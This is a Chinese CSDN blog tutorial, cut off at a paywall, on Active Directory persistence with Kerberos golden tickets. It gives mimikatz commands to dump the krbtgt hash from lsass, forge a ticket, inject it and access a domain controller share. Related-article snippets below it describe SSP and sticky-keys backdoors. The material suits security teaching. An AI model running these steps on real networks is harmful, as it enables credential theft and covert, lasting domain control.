内网安全-权限维持-黄金白银票据维持&基于登录进程劫持-Skeleton Key&SID history&DSRM&SSP权限维持

最新推荐文章于 2024-10-15 11:56:14 发布
最新推荐文章于 2024-10-15 11:56:14 发布
阅读量894 收藏 1
点赞数
分类专栏: 内网安全 文章标签: web安全 服务器 windows 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45701675/article/details/124397597
版权
本文详细介绍了如何利用黄金和白银票据进行域内权限维持,包括获取krbtgt和DC的哈希,伪造用户票据,并通过Skeleton Key、SSP、DSRM和SID历史记录来实现权限持久化。这些技术涉及网络攻击和防御,对理解域安全至关重要。
摘要由CSDN通过智能技术生成

黄金票据

条件:

1、已经拿下域管理员,获取到krbtgt hash;域控SID值-500

2、利用krbtgt的hash制作黄金票据工具,进行攻击。

流程:

1、域名:god.org(ipconfig -all #获取域名)

2、域的SID值:S-1-5-21-1218902331-2157346161-1782232778

获取SID命令:

>whoami /user

>whoami /all

>wmic useraccount get name,sid #获取SID(选500结尾的)

 

获取krbtgt的HASH

>mimikatz privilege::debug

>mimikatz lsadump::lsa /patch #获取krbtgt的ntlmhash

4、伪造用户名:webadmin(任意用户名)

god.org(当前域名)

webadmin(当前用户)

生成票据:

mimikatz kerberos::golden /user:webadmin /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket:gf

 

导入内存:

mimikatz kerberos::ptt gf

 访问测试:

dir \\owa2010cn-god\c$

黄金票据总结:

该攻击⽅式其实是⼀种后⻔的形式,属于第⼆

最低0.47元/天 解锁文章
无名安全
关注
专栏目录
内网安全——权限维持SSP&HOOK&SID& DSRM&Skeleton
m0_61506558的博客
03-01 993
SSP即Security Support Provider(安全支持提供者)是一个用于实现身份验证的DLL文件,主要用于Windows操作系统的身份认证功能。当操作系统启动时SSP会被加载到lsass.exe进程中,由于lsass可通过注册表进行扩展,导致了在操作系统启动时,可以加载一个自定义的dll,来实现想要执行的操作。当我们在域环境内对LSA进行拓展自定义DLL文件时,就能够获取到lsass.exe进程中的明文密码,即使修改密码重新登陆,我们依旧可以获得密码,达到域权限维持的效果。
内网渗透-域内的权限维持
lza20001103的博客
10-01 1081
域内的权限维持 文章目录域内的权限维持前言PTTTGT(黄金票据sspSkeleton KeySID History后记 前言 上期我们讲了windows和Linux中的权限维持,这期我们讲一下域内的权限维持权限维持是后渗透必不可少的环节,大家一定要好好掌握啊。 PTT PTT(票据) window认证机制 http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE
黄金票据维持域控权限
weixin_49196285的博客
12-07 953
黄金票据维持域控权限 实验环境:windows2012域控、windows2012域内主机 实验要求:利用黄金票据维持域控权限 详细步骤: 1.首先搭建相关的域环境 a:设置服务器 b:更改计算机名称 C.安装域控制器和DNS服务 设置完成以后的安装页面如下: d:之后升级服务器并且添加相关的域名,配置完成以后可以在如下页面看到: e:之后把WIN7添加到域控之中,成为域控成员。最后添加用户成功并且最后发现域控搭建成功,登录页面如下: 2.
web权限维持
wodafa的博客
02-27 1321
前言 关于权限维持,我之前写过一篇基于系统端的后门技术文章,如映像劫持啊,lpk之类。当然啦,在拿到权限后,在web端做手脚也是个好办法。 PS:还是希望论坛早点支持markdown哦,不然排版很是费劲。 内容目录: - 构造文件包含漏洞 - 隐蔽性脚本木马 - 构造sql注入点 正文 0x01 构造文件包含漏洞 >**本部分概览:** > * 基本的文
AheadLib DLL劫持工具介绍
最新发布
gitblog_09795的博客
10-15 464
AheadLib DLL劫持工具介绍 【下载地址】AheadLibDLL劫持工具介绍 AheadLib 是一款强大的工具,专门用于生成CPP代码或VS2022工程,适用于DLL劫持场景。该工具支持X86和X64架构,是进行DLL劫持操作的必备工具 ...
权限维持-黄金票据
m0_64815693的博客
06-04 308
权限维持-黄金票据
内网权限维持
wuxinweii的博客
11-10 2832
攻击者在提升权限后,往往会通过建立后门来维持对目标主机的控制权。这样一来,即使修复了被攻击者利用的系统漏洞,攻击者还是可以通过后门继续控制目标系统 一、粘贴键后门 windows 系统下连续按 5 次 shift 可调出其程序,粘滞键是为了那些按钮有困难的人设计的,就是按键困难,那么如果用 ctrl+c,ctrl+v 这种快捷键或者其他需要组合的键时,就会有困难,不具备一次按两个或多个键的能力,那么此时就可以单按 5 下 shift 键来启动粘滞键功能。 所以我们可以通过更改注册表的命令来进行后门维持 在命
毕设&课设&项目&实训-基于page-skeleton-webpack-plugin的修改.zip
02-08
【项目资源】: 包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。 ... 【项目质量】: 所有源码都经过严格测试,...
基于 vue-skeleton-webpack-plugin 的骨架屏实战
10-16
在本文中,我们将深入探讨如何使用 `vue-skeleton-webpack-plugin` 在 Vue 项目中实现骨架屏功能。骨架屏,或称 Skeleton Screen,是一种优化用户体验的技术,它在网页内容实际加载之前展示一个模拟页面布局的静态...
权限维持-域渗透攻击-Golden Ticket (黄金票据)
weixin_43227251的博客
04-13 1741
Golden Ticket (黄金票据) 简义 : 在拥有普通域用户权限和 krbtgt账号的hash的情况下,获取域管理员权限。 发生在上面的过程3,可以伪造TGT(前提是获取krbtgt账号的口令散列值(hash)),宣称自己是域内任何账号,包括域管或者不存在的用户。 1. 首先,黄金票据是全功能的TGT。也就意味着万能票据可用于Kerberos认证的任何服务。票据授予服务盲目地相信TGT中的信息,然后处理TGT并颁发服务票据。 内存中插入黄金票据并不需要提升权限。而且默认情况下,黄金票据的有效期是10
God.org单域环境攻略(三)1
08-08
God.org单域环境攻略(三)1
内网安全--权限维持
weixin_58782362的博客
11-05 845
C:\Windows\System32\mimilsa.log 记录登录的账号密码(前提条件是需要在线切换用户,且服务器不重启)1、mimilib.dll 传到目标域控的c:\windows\system32\目录下。c:\windows\system32\kiwissp.log 记录账号密码文件。方法一:但如果域控制器,被注入的内存的伪造的ssp将会丢失。域环境的权限维持、单机版的权限维持web权限维持。使用此方法即使系统重启,也不会影响到持久化的效果。权限维持:为攻击者创造出稳定的输出。
windows内网渗透--权限维持
weixin_47099592的博客
07-03 770
scr 文件实际上是一个可执行文件,类似于 .exe 文件。它们可以包含相同的代码,并且可以执行相同的任务。注释掉#source /etc/network/interfaces.d/*这个见我上一篇文章,这个还有个思路就是劫持后可以写一个添加管理员用户。将Administrator账户所复制的值,粘贴到hack。成功实现最基础的windows run注册表持久化。攻击机 kali 192.168.1.100。复制Administrator 中的F键值。接下来我们实现最简单的windows持久化。
windows权限维持黄金白银票据&隐藏用户&远控&RustDesk&GotoHttp
剁椒鱼头没剁椒的博客
08-16 2036
总的来说隐藏用户目前的手段基本上服务器出现问题,第一件事都是查询隐藏用户,所以这个算是后门的一种方式,但是现在再来看已经不是那么好用了。这个工具存在一个问题就是有网络的情况下才能够使用,而在无网络的情况下是无法使用的,同时流量是走https协议,需要目标主机开放443端口。简单来说就是:有网络,无限制,可以使用。有网络,如果防火墙限制了443端口,无法使用。无网络,无限制,可以使用,但是可能需要转发,比较麻烦。无网络,有限制,基本上就是无法使用。
权限维持——黄金票据和白金票据
cxrpty的博客
04-03 2036
获得域控得用户密码时,为了防止密码被改,需要进行权限维持 实验一:黄金票据 实验原理:ms14068的漏洞原理是伪造域管的tgt,而黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户 实验条件: 1.域名称 2.域的SID 值 3.域的KRBTGT账户NTLM密码哈希或者aes-256值 4.伪造...
权限维持(黄金票据白银票据)
qq_18811919的博客
03-19 2068
黄金票据白银票据通常被认为属于票据传递攻击(Pass-the-Ticket,简称PTT)的一种。 这是一种针对Windows身份验证系统的攻击,攻击者可以利用缺陷或弱点获取用户或系统 帐户的票据信息,然后将其用于进一步攻击或访问敏感资源本篇文章注意讲述了黄金票据白银票据的数据包分析以及如何进行PTT攻击,讲述了多种利用方式包括CS/mimikatz/Impacket等。
内网学习第十二天--权限维持
m0_59134926的博客
12-20 1048
大体上来讲,这几种权限维持的方法都是通过服务或者注册表,使一些木马开机时自动运行,就可以实现权限维持。1.使用msf的exploit/windows/local/persistence_service模块2.使用msf的post/windows/manage/persistence_exe模块3.使用msf的exploit/windows/local/registry_persistence模块4.使用nc进行权限维持5.使用远程桌面进行权限维持
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值